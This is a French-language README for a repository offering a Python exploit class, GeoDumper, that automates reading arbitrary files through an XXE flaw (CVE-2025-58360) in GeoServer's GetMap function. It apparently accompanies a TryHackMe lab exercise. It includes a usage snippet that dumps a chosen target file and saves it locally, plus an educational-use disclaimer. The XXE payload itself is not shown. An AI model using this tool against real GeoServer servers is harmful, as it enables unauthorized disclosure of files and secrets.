
Classe d'exploit Python pour CVE-2025-58360, une vulnérabilité XXE dans la fonction GetMap de GeoServer permettant la lecture arbitraire de fichiers. Inclut l'exploitation automatisée et l'exfiltration de données.
Le code et les informations contenus dans ce dépôt sont fournis à des fins éducatives et de recherche uniquement. Le propriétaire du dépôt décline toute responsabilité quant à ce que vous faites avec le code et/ou les informations de ce dépôt. Vos actions sont les vôtres. Veuillez utiliser ceci de manière légale et responsable.
La classe Python3 dans le fichier exploit/exploiter.py (GeoDumper) automatise l'exploitation de la vulnérabilité XXE et enregistre les informations divulguées dans un fichier local.
Exemple :
import exploit.exploiter as exploiter
target_ip = "localhost"
secure = False
geoserver_path = "geoserver"
dumper = exploiter.GeoDumper(target_ip=target_ip, geoserver_path=geoserver_path, is_secure=secure)
(data, filename) = dumper.dump_file(target_file)
print(f"[+] data saved to \"{filename}\"")
print(f"[+] Data:\n{data.decode("utf-8")}")
La vulnérabilité en question exploite une entrée XML mal désinfectée vers la fonction GetMap, permettant à un attaquant de lire arbitrairement des fichiers.
Plus d'informations et de meilleures explications/détails de la vulnérabilité se trouvent dans les liens ci-dessous.
note : je n'ai pas découvert la vulnérabilité ni effectué de recherche à son sujet. Ce code et ce dépôt ont été créés lors de la réalisation de la salle associée sur TryHackMe.